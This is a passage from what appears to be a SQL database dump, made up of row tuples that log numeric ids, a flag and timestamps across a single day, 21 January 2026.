11:44:46'),(102804,5712,1,'2026-01-21','2026-01-21 11:45:00'),(102805,5712,1,'2026-01-21','2026-01-21 11:45:26'),(102806,5712,1,'2026-01-21','2026-01-21 11:45:27'),(102807,5712,1,'2026-01-21','2026-01-21 11:46:08'),(102808,5712,1,'2026-01-21','2026-01-21 11:46:34'),(102809,5712,1,'2026-01-21','2026-01-21 11:46:56'),(102810,5712,1,'2026-01-21','2026-01-21 11:47:07'),(102811,5712,1,'2026-01-21','2026-01-21 11:47:07'),(102812,5712,1,'2026-01-21','2026-01-21 11:47:14'),(102813,5712,1,'2026-01-21','2026-01-21 11:47:25'),(102814,5712,1,'2026-01-21','2026-01-21 11:48:46'),(102815,5712,1,'2026-01-21','2026-01-21 11:50:02'),(102816,5712,1,'2026-01-21','2026-01-21 11:52:08'),(102817,5712,1,'2026-01-21','2026-01-21 11:52:17'),(102818,5712,1,'2026-01-21','2026-01-21 11:52:19'),(102819,5712,1,'2026-01-21','2026-01-21 11:53:37'),(102820,5712,1,'2026-01-21','2026-01-21 11:53:46'),(102821,5712,1,'2026-01-21','2026-01-21 11:54:13'),(102822,5712,1,'2026-01-21','2026-01-21 11:55:30'),(102823,5712,1,'2026-01-21','2026-01-21 11:57:41'),(102824,5712,1,'2026-01-21','2026-01-21 11:58:03'),(102825,5712,1,'2026-01-21','2026-01-21 11:58:03'),(102826,5712,1,'2026-01-21','2026-01-21 11:58:18'),(102827,5712,1,'2026-01-21','2026-01-21 11:59:10'),(102828,5712,1,'2026-01-21','2026-01-21 11:59:44'),(102829,5712,1,'2026-01-21','2026-01-21 11:59:53'),(102830,5712,1,'2026-01-21','2026-01-21 12:01:14'),(102831,74,1,'2026-01-21','2026-01-21 12:01:27'),(102832,5712,1,'2026-01-21','2026-01-21 12:02:21'),(102833,5712,1,'2026-01-21','2026-01-21 12:03:23'),(102834,5712,1,'2026-01-21','2026-01-21 12:03:58'),(102835,5712,1,'2026-01-21','2026-01-21 12:04:12'),(102836,5712,1,'2026-01-21','2026-01-21 12:04:22'),(102837,5712,1,'2026-01-21','2026-01-21 12:04:25'),(102838,5712,1,'2026-01-21','2026-01-21 12:04:58'),(102839,5712,1,'2026-01-21','2026-01-21 12:05:31'),(102840,5712,1,'2026-01-21','2026-01-21 12:05:54'),(102841,2503,1,'2026-01-21','2026-01-21 12:05:58'),(102842,5712,1,'2026-01-21','2026-01-21 12:06:07'),(102843,5712,1,'2026-01-21','2026-01-21 12:07:17'),(102844,4556,1,'2026-01-21','2026-01-21 12:07:36'),(102845,5712,1,'2026-01-21','2026-01-21 12:08:20'),(102846,5712,1,'2026-01-21','2026-01-21 12:08:31'),(102847,5712,1,'2026-01-21','2026-01-21 12:09:52'),(102848,5712,1,'2026-01-21','2026-01-21 12:11:10'),(102849,5712,1,'2026-01-21','2026-01-21 12:13:52'),(102850,5461,1,'2026-01-21','2026-01-21 12:13:55'),(102851,5712,1,'2026-01-21','2026-01-21 12:14:48'),(102852,5712,1,'2026-01-21','2026-01-21 12:15:13'),(102853,5712,1,'2026-01-21','2026-01-21 12:15:35'),(102854,5712,1,'2026-01-21','2026-01-21 12:16:08'),(102855,5712,1,'2026-01-21','2026-01-21 12:16:33'),(102856,5712,1,'2026-01-21','2026-01-21 12:18:54'),(102857,5712,1,'2026-01-21','2026-01-21 12:21:33'),(102858,5712,1,'2026-01-21','2026-01-21 12:22:10'),(102859,5712,1,'2026-01-21','2026-01-21 12:23:10'),(102860,4930,1,'2026-01-21','2026-01-21 12:23:56'),(102861,68,1,'2026-01-21','2026-01-21 12:24:21'),(102862,5712,1,'2026-01-21','2026-01-21 12:25:01'),(102863,5712,1,'2026-01-21','2026-01-21 12:26:17'),(102864,5712,1,'2026-01-21','2026-01-21 12:26:48'),(102865,5712,1,'2026-01-21','2026-01-21 12:27:09'),(102866,5712,1,'2026-01-21','2026-01-21 12:27:16'),(102867,5712,1,'2026-01-21','2026-01-21 12:27:48'),(102868,5712,1,'2026-01-21','2026-01-21 12:28:19'),(102869,5712,1,'2026-01-21','2026-01-21 12:28:21'),(102870,5712,1,'2026-01-21','2026-01-21 12:28:54'),(102871,5712,1,'2026-01-21','2026-01-21 12:29:47'),(102872,5712,1,'2026-01-21','2026-01-21 12:30:53'),(102873,5712,1,'2026-01-21','2026-01-21 12:32:20'),(102874,5712,1,'2026-01-21','2026-01-21 12:33:11'),(102875,5712,1,'2026-01-21','2026-01-21 12:34:52'),(102876,5712,1,'2026-01-21','2026-01-21 12:35:27'),(102877,5712,1,'2026-01-21','2026-01-21 12:36:20'),(102878,5712,1,'2026-01-21','2026-01-21 12:38:46'),(102879,5712,1,'2026-01-21','2026-01-21 12:38:46'),(102880,5712,1,'2026-01-21','2026-01-21 12:39:36'),(102881,5712,1,'2026-01-21','2026-01-21 12:40:24'),(102882,5712,1,'2026-01-21','2026-01-21 12:40:41'),(102883,5712,1,'2026-01-21','2026-01-21 12:41:14'),(102884,74,1,'2026-01-21','2026-01-21 12:41:34'),(102885,5712,1,'2026-01-21','2026-01-21 12:41:40'),(102886,5712,1,'2026-01-21','2026-01-21 12:42:23'),(102887,2503,1,'2026-01-21','2026-01-21 12:42:54'),(102888,5712,1,'2026-01-21','2026-01-21 12:43:42'),(102889,5712,1,'2026-01-21','2026-01-21 12:44:07'),(102890,5712,1,'2026-01-21','2026-01-21 12:44:35'),(102891,4950,1,'2026-01-21','2026-01-21 12:46:56'),(102892,5712,1,'2026-01-21','2026-01-21 12:47:51'),(102893,5712,1,'2026-01-21','2026-01-21 12:48:05'),(102894,5712,1,'2026-01-21','2026-01-21 12:48:07'),(102895,5712,1,'2026-01-21','2026-01-21 12:48:15'),(102896,4950,1,'2026-01-21','2026-01-21 12:48:33'),(102897,5712,1,'2026-01-21','2026-01-21 12:48:43'),(102898,76,1,'2026-01-21','2026-01-21 12:48:57'),(102899,4950,1,'2026-01-21','2026-01-21 12:49:04'),(102900,80,1,'2026-01-21','2026-01-21 12:49:09'),(102901,5712,1,'2026-01-21','2026-01-21 12:50:03'),(102902,5356,1,'2026-01-21','2026-01-21 12:50:06'),(102903,4950,1,'2026-01-21','2026-01-21 12:50:18'),(102904,335,1,'2026-01-21','2026-01-21 12:50:32'),(102905,76,1,'2026-01-21','2026-01-21 12:50:46'),(102906,5712,1,'2026-01-21','2026-01-21 12:51:14'),(102907,5712,1,'2026-01-21','2026-01-21 12:51:21'),(102908,5712,1,'2026-01-21','2026-01-21 12:51:49'),(102909,5712,1,'2026-01-21','2026-01-21 12:53:55'),(102910,5712,1,'2026-01-21','2026-01-21 12:54:15'),(102911,5712,1,'2026-01-21','2026-01-21 12:55:19'),(102912,5712,1,'2026-01-21','2026-01-21 12:55:33'),(102913,5712,1,'2026-01-21','2026-01-21 12:55:34'),(102914,5712,1,'2026-01-21','2026-01-21 12:56:35'),(102915,5712,1,'2026-01-21','2026-01-21 12:56:55'),(102916,5712,1,'2026-01-21','2026-01-21 12:57:28'),(102917,5712,1,'2026-01-21','2026-01-21 12:58:53'),(102918,5712,1,'2026-01-21','2026-01-21 12:59:45'),(102919,5712,1,'2026-01-21','2026-01-21 12:59:48'),(102920,5712,1,'2026-01-21','2026-01-21 12:59:55'),(102921,5712,1,'2026-01-21','2026-01-21 13:00:23'),(102922,5712,1,'2026-01-21','2026-01-21 13:02:46'),(102923,5712,1,'2026-01-21','2026-01-21 13:03:08'),(102924,5712,1,'2026-01-21','2026-01-21 13:04:35'),(102925,5712,1,'2026-01-21','2026-01-21 13:05:35'),(102926,5712,1,'2026-01-21','2026-01-21 13:05:50'),(102927,5712,1,'2026-01-21','2026-01-21 13:09:20'),(102928,5712,1,'2026-01-21','2026-01-21 13:10:54'),(102929,5712,1,'2026-01-21','2026-01-21 13:12:30'),(102930,5712,1,'2026-01-21','2026-01-21 13:13:09'),(102931,5712,1,'2026-01-21','2026-01-21 13:14:00'),(102932,5712,1,'2026-01-21','2026-01-21 13:14:01'),(102933,5712,1,'2026-01-21','2026-01-21 13:14:41'),(102934,5712,1,'2026-01-21','2026-01-21 13:15:32'),(102935,5712,1,'2026-01-21','2026-01-21 13:15:36'),(102936,5712,1,'2026-01-21','2026-01-21 13:15:52'),(102937,5712,1,'2026-01-21','2026-01-21 13:16:35'),(102938,5712,1,'2026-01-21','2026-01-21 13:18:06'),(102939,5712,1,'2026-01-21','2026-01-21 13:21:00'),(102940,5712,1,'2026-01-21','2026-01-21 13:21:14'),(102941,5712,1,'2026-01-21','2026-01-21 13:21:19'),(102942,5712,1,'2026-01-21','2026-01-21 13:22:43'),(102943,5712,1,'2026-01-21','2026-01-21 13:23:28'),(102944,5626,1,'2026-01-21','2026-01-21 13:23:32'),(102945,5712,1,'2026-01-21','2026-01-21 13:24:18'),(102946,5712,1,'2026-01-21','2026-01-21 13:25:06'),(102947,5712,1,'2026-01-21','2026-01-21 13:26:05'),(102948,5712,1,'2026-01-21','2026-01-21 13:26:37'),(102949,5712,1,'2026-01-21','2026-01-21 13:27:00'),(102950,5712,1,'2026-01-21','2026-01-21 13:27:28'),(102951,5712,1,'2026-01-21','2026-01-21 13:27:28'),(102952,5712,1,'2026-01-21','2026-01-21 13:27:30'),(102953,4944,1,'2026-01-21','2026-01-21 13:27:39'),(102954,5712,1,'2026-01-21','2026-01-21 13:28:36'),(102955,5712,1,'2026-01-21','2026-01-21 13:29:47'),(102956,5712,1,'2026-01-21','2026-01-21 13:29:52'),(102957,5712,1,'2026-01-21','2026-01-21 13:31:14'),(102958,5712,1,'2026-01-21','2026-01-21 13:31:28'),(102959,5712,1,'2026-01-21','2026-01-21 13:31:28'),(102960,84,1,'2026-01-21','2026-01-21 13:31:45'),(102961,5712,1,'2026-01-21','2026-01-21 13:32:19'),(102962,5712,1,'2026-01-21','2026-01-21 13:32:31'),(102963,2904,1,'2026-01-21','2026-01-21 13:32:39'),(102964,5712,1,'2026-01-21','2026-01-21 13:32:44'),(102965,2904,1,'2026-01-21','2026-01-21 13:33:42'),(102966,5712,1,'2026-01-21','2026-01-21 13:33:50'),(102967,5712,1,'2026-01-21','2026-01-21 13:34:28'),(102968,5712,1,'2026-01-21','2026-01-21 13:34:39'),(102969,74,1,'2026-01-21','2026-01-21 13:34:50'),(102970,5712,1,'2026-01-21','2026-01-21 13:35:01'),(102971,2904,1,'2026-01-21','2026-01-21 13:35:08'),(102972,2904,1,'2026-01-21','2026-01-21 13:35:24'),(102973,2904,1,'2026-01-21','2026-01-21 13:35:52'),(102974,5712,1,'2026-01-21','2026-01-21 13:37:07'),(102975,2904,1,'2026-01-21','2026-01-21 13:37:17'),(102976,5712,1,'2026-01-21','2026-01-21 13:37:25'),(102977,2904,1,'2026-01-21','2026-01-21 13:37:43'),(102978,2904,1,'2026-01-21','2026-01-21 13:38:48'),(102979,5712,1,'2026-01-21','2026-01-21 13:39:49'),(102980,5712,1,'2026-01-21','2026-01-21 13:40:39'),(102981,5712,1,'2026-01-21','2026-01-21 13:40:59'),(102982,5712,1,'2026-01-21','2026-01-21 13:41:15'),(102983,5712,1,'2026-01-21','2026-01-21 13:42:44'),(102984,5712,1,'2026-01-21','2026-01-21 13:42:51'),(102985,5712,1,'2026-01-21','2026-01-21 13:44:42'),(102986,5712,1,'2026-01-21','2026-01-21 13:45:19'),(102987,5712,1,'2026-01-21','2026-01-21 13:46:58'),(102988,5712,1,'2026-01-21','2026-01-21 13:47:21'),(102989,5712,1,'2026-01-21','2026-01-21 13:48:36'),(102990,5712,1,'2026-01-21','2026-01-21 13:48:48'),(102991,5712,1,'2026-01-21','2026-01-21 13:50:43'),(102992,5712,1,'2026-01-21','2026-01-21 13:50:46'),(102993,5712,1,'2026-01-21','2026-01-21 13:50:52'),(102994,5712,1,'2026-01-21','2026-01-21 13:52:02'),(102995,5712,1,'2026-01-21','2026-01-21 13:52:03'),(102996,5712,1,'2026-01-21','2026-01-21 13:53:21'),(102997,5712,1,'2026-01-21','2026-01-21 13:54:12'),(102998,5712,1,'2026-01-21','2026-01-21 13:54:54'),(102999,5712,1,'2026-01-21','2026-01-21 13:55:46'),(103000,5712,1,'2026-01-21','2026-01-21 13:56:16'),(103001,5712,1,'2026-01-21','2026-01-21 13:57:27'),(103002,5712,1,'2026-01-21','2026-01-21 13:57:51'),(103003,5712,1,'2026-01-21','2026-01-21 13:58:05'),(103004,5712,1,'2026-01-21','2026-01-21 13:58:38'),(103005,5712,1,'2026-01-21','2026-01-21 14:04:55'),(103006,5712,1,'2026-01-21','2026-01-21 14:05:06'),(103007,5712,1,'2026-01-21','2026-01-21 14:07:06'),(103008,5712,1,'2026-01-21','2026-01-21 14:07:49'),(103009,3694,1,'2026-01-21','2026-01-21 14:08:38'),(103010,5712,1,'2026-01-21','2026-01-21 14:09:48'),(103011,5712,1,'2026-01-21','2026-01-21 14:12:26'),(103012,5712,1,'2026-01-21','2026-01-21 14:12:54'),(103013,5712,1,'2026-01-21','2026-01-21 14:12:56'),(103014,5712,1,'2026-01-21','2026-01-21 14:13:00'),(103015,5712,1,'2026-01-21','2026-01-21 14:13:01'),(103016,5712,1,'2026-01-21','2026-01-21 14:13:04'),(103017,5712,1,'2026-01-21','2026-01-21 14:13:05'),(103018,5712,1,'2026-01-21','2026-01-21 14:13:08'),(103019,5712,1,'2026-01-21','2026-01-21 14:13:09'),(103020,5712,1,'2026-01-21','2026-01-21 14:13:10'),(103021,4301,1,'2026-01-21','2026-01-21 14:13:46'),(103022,5712,1,'2026-01-21','2026-01-21 14:13:49'),(103023,5712,1,'2026-01-21','2026-01-21 14:14:25'),(103024,5712,1,'2026-01-21','2026-01-21 14:14:34'),(103025,5712,1,'2026-01-21','2026-01-21 14:15:17'),(103026,5712,1,'2026-01-21','2026-01-21 14:15:44'),(103027,5712,1,'2026-01-21','2026-01-21 14:16:57'),(103028,5712,1,'2026-01-21','2026-01-21 14:17:00'),(103029,5712,1,'2026-01-21','2026-01-21 14:17:31'),(103030,5712,1,'2026-01-21','2026-01-21 14:17:43'),(103031,5712,1,'2026-01-21','2026-01-21 14:19:12'),(103032,5712,1,'2026-01-21','2026-01-21 14:20:31'),(103033,5712,1,'2026-01-21','2026-01-21 14:20:36'),(103034,5712,1,'2026-01-21','2026-01-21 14:21:23'),(103035,5712,1,'2026-01-21','2026-01-21 14:25:20'),(103036,5712,1,'2026-01-21','2026-01-21 14:26:11'),(103037,5712,1,'2026-01-21','2026-01-21 14:26:55'),(103038,5712,1,'2026-01-21','2026-01-21 14:27:06'),(103039,5712,1,'2026-01-21','2026-01-21 14:32:57'),(103040,5712,1,'2026-01-21','2026-01-21 14:36:54'),(103041,5712,1,'2026-01-21','2026-01-21 14:37:08'),(103042,5712,1,'2026-01-21','2026-01-21 14:37:40'),(103043,5712,1,'2026-01-21','2026-01-21 14:38:51'),(103044,5712,1,'2026-01-21','2026-01-21 14:40:10'),(103045,5712,1,'2026-01-21','2026-01-21 14:42:04'),(103046,5712,1,'2026-01-21','2026-01-21 14:43:06'),(103047,5712,1,'2026-01-21','2026-01-21 14:43:40'),(103048,5712,1,'2026-01-21','2026-01-21 14:43:40'),(103049,5712,1,'2026-01-21','2026-01-21 14:45:42'),(103050,5712,1,'2026-01-21','2026-01-21 14:47:57'),(103051,2904,1,'2026-01-21','2026-01-21 14:48:18'),(103052,5712,1,'2026-01-21','2026-01-21 14:48:53'),(103053,5712,1,'2026-01-21','2026-01-21 14:49:42'),(103054,5712,1,'2026-01-21','2026-01-21 14:51:05'),(103055,5712,1,'2026-01-21','2026-01-21 14:51:42'),(103056,5712,1,'2026-01-21','2026-01-21 14:55:44'),(103057,5712,1,'2026-01-21','2026-01-21 14:57:00'),(103058,5712,1,'2026-01-21','2026-01-21 14:59:11'),(103059,5712,1,'2026-01-21','2026-01-21 14:59:43'),(103060,5712,1,'2026-01-21','2026-01-21 15:00:14'),(103061,5712,1,'2026-01-21','2026-01-21 15:00:16'),(103062,5712,1,'2026-01-21','2026-01-21 15:02:35'),(103063,5712,1,'2026-01-21','2026-01-21 15:02:48'),(103064,5712,1,'2026-01-21','2026-01-21 15:02:49'),(103065,5712,1,'2026-01-21','2026-01-21 15:02:50'),(103066,5712,1,'2026-01-21','2026-01-21 15:03:20'),(103067,5712,1,'2026-01-21','2026-01-21 15:03:46'),(103068,5712,1,'2026-01-21','2026-01-21 15:04:10'),(103069,5712,1,'2026-01-21','2026-01-21 15:05:54'),(103070,5712,1,'2026-01-21','2026-01-21 15:09:06'),(103071,5712,1,'2026-01-21','2026-01-21 15:09:11'),(103072,5712,1,'2026-01-21','2026-01-21 15:09:29'),(103073,5712,1,'2026-01-21','2026-01-21 15:10:54'),(103074,5712,1,'2026-01-21','2026-01-21 15:13:44'),(103075,5712,1,'2026-01-21','2026-01-21 15:14:06'),(103076,2904,1,'2026-01-21','2026-01-21 15:14:10'),(103077,5712,1,'2026-01-21','2026-01-21 15:15:20'),(103078,5712,1,'2026-01-21','2026-01-21 15:16:05'),(103079,483,1,'2026-01-21','2026-01-21 15:16:44'),(103080,5712,1,'2026-01-21','2026-01-21 15:18:19'),(103081,5712,1,'2026-01-21','2026-01-21 15:18:25'),(103082,5712,1,'2026-01-21','2026-01-21 15:18:41'),(103083,5712,1,'2026-01-21','2026-01-21 15:19:16'),(103084,5712,1,'2026-01-21','2026-01-21 15:20:21'),(103085,5712,1,'2026-01-21','2026-01-21 15:20:52'),(103086,5712,1,'2026-01-21','2026-01-21 15:22:06'),(103087,5712,1,'2026-01-21','2026-01-21 15:23:04'),(103088,2904,1,'2026-01-21','2026-01-21 15:23:33'),(103089,5712,1,'2026-01-21','2026-01-21 15:23:54'),(103090,5712,1,'2026-01-21','2026-01-21 15:24:31'),(103091,5712,1,'2026-01-21','2026-01-21 15:24:51'),(103092,5712,1,'2026-01-21','2026-01-21 15:26:32'),(103093,5712,1,'2026-01-21','2026-01-21 15:26:53'),(103094,5708,1,'2026-01-21','2026-01-21 15:27:03'),(103095,5712,1,'2026-01-21','2026-01-21 15:27:13'),(103096,5712,1,'2026-01-21','2026-01-21 15:27:43'),(103097,5712,1,'2026-01-21','2026-01-21 15:28:47'),(103098,5712,1,'2026-01-21','2026-01-21 15:29:21'),(103099,5712,1,'2026-01-21','2026-01-21 15:29:34'),(103100,5712,1,'2026-01-21','2026-01-21 15:30:13'),(103101,5712,1,'2026-01-21','2026-01-21 15:30:17'),(103102,2558,1,'2026-01-21','2026-01-21 15:30:20'),(103103,5712,1,'2026-01-21','2026-01-21 15:30:29'),(103104,5712,1,'2026-01-21','2026-01-21 15:31:14'),(103105,5712,1,'2026-01-21','2026-01-21 15:31:23'),(103106,74,1,'2026-01-21','2026-01-21 15:31:43'),(103107,1582,1,'2026-01-21','2026-01-21 15:31:52'),(103108,5639,1,'2026-01-21','2026-01-21 15:32:59'),(103109,5712,1,'2026-01-21','2026-01-21 15:33:19'),(103110,5712,1,'2026-01-21','2026-01-21 15:35:09'),(103111,5712,1,'2026-01-21','2026-01-21 15:35:22'),(103112,1610,1,'2026-01-21','2026-01-21 15:35:40'),(103113,5712,1,'2026-01-21','2026-01-21 15:41:28'),(103114,5712,1,'2026-01-21','2026-01-21 15:41:57'),(103115,5712,1,'2026-01-21','2026-01-21 15:42:11'),(103116,5712,1,'2026-01-21','2026-01-21 15:42:30'),(103117,74,1,'2026-01-21','2026-01-21 15:43:43'),(103118,5712,1,'2026-01-21','2026-01-21 15:45:04'),(103119,5712,1,'2026-01-21','2026-01-21 15:46:23'),(103120,5712,1,'2026-01-21','2026-01-21 15:46:34'),(103121,5712,1,'2026-01-21','2026-01-21 15:48:04'),(103122,2904,1,'2026-01-21','2026-01-21 15:48:16'),(103123,5712,1,'2026-01-21','2026-01-21 15:49:07'),(103124,5712,1,'2026-01-21','2026-01-21 15:49:45'),(103125,5712,1,'2026-01-21','2026-01-21 15:50:16'),(103126,1610,1,'2026-01-21','2026-01-21 15:51:22'),(103127,5712,1,'2026-01-21','2026-01-21 15:51:52'),(103128,2904,1,'2026-01-21','2026-01-21 15:56:04'),(103129,4930,1,'2026-01-21','2026-01-21 15:56:55'),(103130,5712,1,'2026-01-21','2026-01-21 15:59:08'),(103131,5712,1,'2026-01-21','2026-01-21 16:01:36'),(103132,76,1,'2026-01-21','2026-01-21 16:01:55'),(103133,5712,1,'2026-01-21','2026-01-21 16:03:14'),(103134,5712,1,'2026-01-21','2026-01-21 16:04:38'),(103135,5712,1,'2026-01-21','2026-01-21 16:09:13'),(103136,5712,1,'2026-01-21','2026-01-21 16:09:18'),(103137,5712,1,'2026-01-21','2026-01-21 16:09:32'),(103138,5712,1,'2026-01-21','2026-01-21 16:09:43'),(103139,5712,1,'2026-01-21','2026-01-21 16:13:16'),(103140,5712,1,'2026-01-21','2026-01-21 16:19:09'),(103141,5712,1,'2026-01-21','2026-01-21 16:23:40'),(103142,5712,1,'2026-01-21','2026-01-21 16:25:13'),(103143,5712,1,'2026-01-21','2026-01-21 16:28:15'),(103144,5712,1,'2026-01-21','2026-01-21 16:28:21'),(103145,5712,1,'2026-01-21','2026-01-21 16:28:39'),(103146,5712,1,'2026-01-21','2026-01-21 16:28:41'),(103147,5712,1,'2026-01-21','2026-01-21 16:29:15'),(103148,5712,1,'2026-01-21','2026-01-21 16:30:45'),(103149,5712,1,'2026-01-21','2026-01-21 16:33:35'),(103150,5712,1,'2026-01-21','2026-01-21 16:40:07'),(103151,5712,1,'2026-01-21','2026-01-21 16:40:57'),(103152,5712,1,'2026-01-21','2026-01-21 16:46:33'),(103153,5712,1,'2026-01-21','2026-01-21 16:46:44'),(103154,5712,1,'2026-01-21','2026-01-21 16:47:59'),(103155,5712,1,'2026-01-21','2026-01-21 16:49:05'),(103156,5712,1,'2026-01-21','2026-01-21 16:49:28'),(103157,5712,1,'2026-01-21','2026-01-21 16:50:29'),(103158,5639,1,'2026-01-21','2026-01-21 16:50:48'),(103159,5639,1,'2026-01-21','2026-01-21 16:50:50'),(103160,5712,1,'2026-01-21','2026-01-21 16:51:39'),(103161,5639,1,'2026-01-21','2026-01-21 16:52:07'),(103162,5712,1,'2026-01-21','2026-01-21 16:52:38'),(103163,5712,1,'2026-01-21','2026-01-21 16:53:20'),(103164,5639,1,'2026-01-21','2026-01-21 16:53:27'),(103165,5712,1,'2026-01-21','2026-01-21 16:55:04'),(103166,5712,1,'2026-01-21','2026-01-21 17:03:51'),(103167,5409,1,'2026-01-21','2026-01-21 17:06:57'),(103168,5712,1,'2026-01-21','2026-01-21 17:07:03'),(103169,5712,1,'2026-01-21','2026-01-21 17:07:07'),(103170,5712,1,'2026-01-21','2026-01-21 17:13:48'),(103171,5712,1,'2026-01-21','2026-01-21 17:14:48'),(103172,5712,1,'2026-01-21','2026-01-21 17:18:21'),(103173,5712,1,'2026-01-21','2026-01-21 17:18:21'),(103174,5712,1,'2026-01-21','2026-01-21 17:19:51'),(103175,5712,1,'2026-01-21','2026-01-21 17:21:47'),(103176,5712,1,'2026-01-21','2026-01-21 17:26:14'),(103177,5712,1,'2026-01-21','2026-01-21 17:26:37'),(103178,5712,1,'2026-01-21','2026-01-21 17:28:18'),(103179,5712,1,'2026-01-21','2026-01-21 17:29:02'),(103180,5712,1,'2026-01-21','2026-01-21 17:30:44'),(103181,5712,1,'2026-01-21','2026-01-21 17:31:20'),(103182,4323,1,'2026-01-21','2026-01-21 17:32:14'),(103183,5712,1,'2026-01-21','2026-01-21 17:38:03'),(103184,5712,1,'2026-01-21','2026-01-21 17:39:57'),(103185,5712,1,'2026-01-21','2026-01-21 17:40:06'),(103186,5712,1,'2026-01-21','2026-01-21 17:40:12'),(103187,5712,1,'2026-01-21','2026-01-21 17:40:14'),(103188,5712,1,'2026-01-21','2026-01-21 17:42:02'),(103189,5712,1,'2026-01-21','2026-01-21 17:44:52'),(103190,5712,1,'2026-01-21','2026-01-21 17:45:54'),(103191,5712,1,'2026-01-21','2026-01-21 17:47:21'),(103192,5712,1,'2026-01-21','2026-01-21 17:48:37'),(103193,5712,1,'2026-01-21','2026-01-21 17:50:58'),(103194,5712,1,'2026-01-21','2026-01-21 17:54:26'),(103195,5712,1,'2026-01-21','2026-01-21 17:55:00'),(103196,5712,1,'2026-01-21','2026-01-21 17:55:22'),(103197,5712,1,'2026-01-21','2026-01-21 17:57:44'),(103198,5397,1,'2026-01-21','2026-01-21 18:00:08'),(103199,5712,1,'2026-01-21','2026-01-21 18:01:04'),(103200,5712,1,'2026-01-21','2026-01-21 18:03:43'),(103201,5712,1,'2026-01-21','2026-01-21 18:05:50'),(103202,5712,1,'2026-01-21','2026-01-21 18:06:25'),(103203,5712,1,'2026-01-21','2026-01-21 18:14:30'),(103204,5712,1,'2026-01-21','2026-01-21 18:14:51'),(103205,5712,1,'2026-01-21','2026-01-21 18:15:37'),(103206,5712,1,'2026-01-21','2026-01-21 18:16:50'),(103207,5712,1,'2026-01-21','2026-01-21 18:17:26'),(103208,5712,1,'2026-01-21','2026-01-21 18:22:17'),(103209,2904,1,'2026-01-21','2026-01-21 18:24:48'),(103210,102,1,'2026-01-21','2026-01-21 18:25:10'),(103211,2904,1,'2026-01-21','2026-01-21 18:25:24'),(103212,5712,1,'2026-01-21','2026-01-21 18:26:25'),(103213,5712,1,'2026-01-21','2026-01-21 18:26:29'),(103214,5712,1,'2026-01-21','2026-01-21 18:27:17'),(103215,5712,1,'2026-01-21','2026-01-21 18:27:30'),(103216,5712,1,'2026-01-21','2026-01-21 18:27:56'),(103217,5712,1,'2026-01-21','2026-01-21 18:29:07'),(103218,5397,1,'2026-01-21','2026-01-21 18:34:54'),(103219,5712,1,'2026-01-21','2026-01-21 18:35:36'),(103220,5712,1,'2026-01-21','2026-01-21 18:39:19'),(103221,5712,1,'2026-01-21','2026-01-21 18:41:18'),(103222,5712,1,'2026-01-21','2026-01-21 18:42:38'),(103223,5712,1,'2026-01-21','2026-01-21 18:46:09'),(103224,5712,1,'2026-01-21','2026-01-21 18:49:28'),(103225,5712,1,'2026-01-21','2026-01-21 18:52:04'),(103226,5712,1,'2026-01-21','2026-01-21 18:53:38'),(103227,5712,1,'2026-01-21','2026-01-21 18:53:40'),(103228,5712,1,'2026-01-21','2026-01-21 18:59:23'),(103229,5712,1,'2026-01-21','2026-01-21 18:59:44'),(103230,5712,1,'2026-01-21','2026-01-21 19:03:33'),(103231,5712,1,'2026-01-21','2026-01-21 19:05:33'),(103232,5712,1,'2026-01-21','2026-01-21 19:09:49'),(103233,5712,1,'2026-01-21','2026-01-21 19:13:00'),(103234,5712,1,'2026-01-21','2026-01-21 19:14:31'),(103235,5712,1,'2026-01-21','2026-01-21 19:14:47'),(103236,5712,1,'2026-01-21','2026-01-21 19:14:51'),(103237,5712,1,'2026-01-21','2026-01-21 19:14:56'),(103238,5666,1,'2026-01-21','2026-01-21 19:22:59'),(103239,5712,1,'2026-01-21','2026-01-21 19:23:46'),(103240,5666,1,'2026-01-21','2026-01-21 19:26:12'),(103241,5712,1,'2026-01-21','2026-01-21 19:26:18'),(103242,5712,1,'2026-01-21','2026-01-21 19:28:47'),(103243,5712,1,'2026-01-21','2026-01-21 19:28:52'),(103244,5712,1,'2026-01-21','2026-01-21 19:30:39'),(103245,5712,1,'2026-01-21','2026-01-21 19:31:01'),(103246,5712,1,'2026-01-21','2026-01-21 19:31:03'),(103247,5712,1,'2026-01-21','2026-01-21 19:35:31'),(103248,5712,1,'2026-01-21','2026-01-21 19:37:15'),(103249,5712,1,'2026-01-21','2026-01-21 19:38:24'),(103250,5712,1,'2026-01-21','2026-01-21 19:38:45'),(103251,5712,1,'2026-01-21','2026-01-21 19:38:50'),(103252,5712,1,'2026-01-21','2026-01-21 19:39:49'),(103253,5712,1,'2026-01-21','2026-01-21 19:40:08'),(103254,5712,1,'2026-01-21','2026-01-21 19:41:52'),(103255,5712,1,'2026-01-21','2026-01-21 19:42:51'),(103256,5712,1,'2026-01-21','2026-01-21 19:43:09'),(103257,5712,1,'2026-01-21','2026-01-21 19:43:09'),(103258,3102,1,'2026-01-21','2026-01-21 19:44:26'),(103259,5712,1,'2026-01-21','2026-01-21 19:49:38'),(103260,5712,1,'2026-01-21','2026-01-21 19:50:15'),(103261,5712,1,'2026-01-21','2026-01-21 19:50:41'),(103262,5712,1,'2026-01-21','2026-01-21 19:51:09'),(103263,468,1,'2026-01-21','2026-01-21 19:51:37'),(103264,5712,1,'2026-01-21','2026-01-21 19:53:21'),(103265,5712,1,'2026-01-21','2026-01-21 19:53:30'),(103266,5712,1,'2026-01-21','2026-01-21 19:56:59'),(103267,5712,1,'2026-01-21','2026-01-21 19:58:28'),(103268,5712,1,'2026-01-21','2026-01-21 20:08:31'),(103269,5712,1,'2026-01-21','2026-01-21 20:11:39'),(103270,5712,1,'2026-01-21','2026-01-21 20:11:59'),(103271,5712,1,'2026-01-21','2026-01-21 20:13:38'),(103272,2904,1,'2026-01-21','2026-01-21 20:14:34'),(103273,5712,1,'2026-01-21','2026-01-21 20:14:51'),(103274,5712,1,'2026-01-21','2026-01-21 20:15:13'),(103275,3287,1,'2026-01-21','2026-01-21 20:15:27'),(103276,5712,1,'2026-01-21','2026-01-21 20:16:07'),(103277,80,1,'2026-01-21','2026-01-21 20:16:26'),(103278,5712,1,'2026-01-21','2026-01-21 20:19:35'),(103279,3090,1,'2026-01-21','2026-01-21 20:20:17'),(103280,5712,1,'2026-01-21','2026-01-21 20:20:49'),(103281,5712,1,'2026-01-21','2026-01-21 20:21:53'),(103282,5712,1,'2026-01-21','2026-01-21 20:22:49'),(103283,5712,1,'2026-01-21','2026-01-21 20:23:25'),(103284,5712,1,'2026-01-21','2026-01-21 20:28:13'),(103285,5712,1,'2026-01-21','2026-01-21 20:28:25'),(103286,1602,1,'2026-01-21','2026-01-21 20:28:29'),(103287,5712,1,'2026-01-21','2026-01-21 